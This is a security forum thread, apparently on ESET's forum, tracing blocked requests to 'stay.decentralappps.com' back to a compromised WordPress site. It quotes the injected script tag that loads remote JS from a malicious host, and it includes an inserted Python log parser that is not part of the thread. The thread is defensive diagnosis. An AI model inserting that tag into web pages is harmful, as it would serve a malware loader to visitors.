
stay.decentralappps.com


kapela86


I'm getting lots of reports in ESET Protect from different computers that the website "stay.decentralappps.com" was "Blocked by internal blacklist". What I don't know is how this is triggered or which website tried to load it, because all the reports come from different browsers.


  • Administrators

To me it looks like SSL/TLS filtering is not working properly, otherwise Web access protection should have detected a malicious JS before it could be executed:


Is the eicar test file downloaded from https://secure.eicar.org/eicar_com.zip detected upon download?


Here's the SysInspector log.

And about eicar: it was detected before the browser even downloaded it, but I tested this on my own computer, not the one I sent those reports from. All computers have the same policy, except some computers where I use Web Filtering with "*" blocked and allow specific domains. These logs are from that kind of computer.

[screenshot]

SysInspector log export 2023-09-21 16-30-12.zip


The Eicar .zip download should have been blocked by Web Access protection, i.e. the HTTP filter:

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/21/2023 11:09:05 AM;HTTP filter;file;https://secure.eicar.org/eicar_com.zip;Eicar test file;connection terminated;xxxxxx;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (1EA307959A891AA89787D5101669BB3587D8C48C).;D27265074C9EAC2E2122ED69294DBC4D7CCE9141;
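As an added example (not from the thread, ESET, or the poster), a small parser for this semicolon-separated detection export: it pulls the requesting application and its SHA-1 out of the free-text Information column and tells HTTP-filter blocks (stopped in transit) apart from on-disk detections, which is exactly the distinction argued about below. The header and first record are the ones quoted above; the second record is constructed.

```python
import csv
import io
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the semicolon-separated layout of an ESET PROTECT detection export.
# Header and first record are quoted from the thread; the second record is made up to show
# what an on-disk detection of the same file looks like.
SAMPLE_EXPORT = r"""Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/21/2023 11:09:05 AM;HTTP filter;file;https://secure.eicar.org/eicar_com.zip;Eicar test file;connection terminated;xxxxxx;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (1EA307959A891AA89787D5101669BB3587D8C48C).;D27265074C9EAC2E2122ED69294DBC4D7CCE9141;
9/21/2023 11:12:40 AM;Real-time file system protection;file;C:\Users\user\Downloads\eicar_com.zip;Eicar test file;cleaned by deleting;xxxxxx;Event occurred on a newly created file.;D27265074C9EAC2E2122ED69294DBC4D7CCE9141;
"""

# The application path and its SHA-1 are embedded in the Information text, not in their own column.
APP_RE = re.compile(r"by the application: (?P<path>.+?) \((?P<sha1>[0-9A-F]{40})\)\.")


@dataclass
class Detection:
    time: str
    scanner: str
    obj: str
    detection: str
    action: str
    app_path: Optional[str]   # process that made the request, if the scanner recorded one
    app_sha1: Optional[str]

    @property
    def via_web_protection(self) -> bool:
        # "HTTP filter" means the object was stopped in transit; other scanners saw it on disk.
        return self.scanner == "HTTP filter"


def parse_export(text: str) -> List[Detection]:
    reader = csv.DictReader(io.StringIO(text), delimiter=";")
    out = []
    for row in reader:
        m = APP_RE.search(row["Information"])
        out.append(Detection(
            time=row["Time"], scanner=row["Scanner"], obj=row["Object"],
            detection=row["Detection"], action=row["Action"],
            app_path=m.group("path") if m else None,
            app_sha1=m.group("sha1") if m else None,
        ))
    return out


def web_blocked_urls(text: str) -> List[str]:
    # Only objects terminated by the HTTP filter are URLs blocked before the download completed.
    return [d.obj for d in parse_export(text) if d.via_web_protection]


if __name__ == "__main__":
    for d in parse_export(SAMPLE_EXPORT):
        where = "web" if d.via_web_protection else "disk"
        print(f"{d.time} [{where}] {d.detection}: {d.obj} (app={d.app_path})")
```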

  • Administrators

Are you able to reproduce the detection? If so, is it enough to open Edge, or is the threat detected only after you have opened a specific website?

If you are talking about stay.decentralappps.com, then I can't reproduce it because I don't know which website triggers this. I could check the web browser history on the other PC tomorrow.

And regarding SSL/TLS filtering not working, what do you propose to do?


  • Administrators
2 minutes ago, kapela86 said:

And regarding SSL/TLS filtering not working, what do you propose to do?

It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk.


1 minute ago, Marcos said:

It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk.

Perhaps not on Chrome? The OP's screenshot shows the Eicar .zip detection on disk, not via the HTTP filter.

  • Administrators

HTTPS scanning works; obviously the connection was terminated and the URI contains an https address. Let's try to reproduce the detection first.

Looks like it's epainfo.pl. There is a

<_script src="https://one.dataofpages.com/stats/post.js" id="temp_weather_script"></script>

in the source. They use WordPress, so it's probably some out-of-date plugin that got hacked.

5 hours ago, kapela86 said:

It kinda sux that you can't see what URL the user visited that triggered this script. This would be very useful.

An example of Balada Injector malware deploying stay.decentralappps.com is given in this article: https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/ .

Bottom line is any legit but vulnerable web site can be nailed by this.
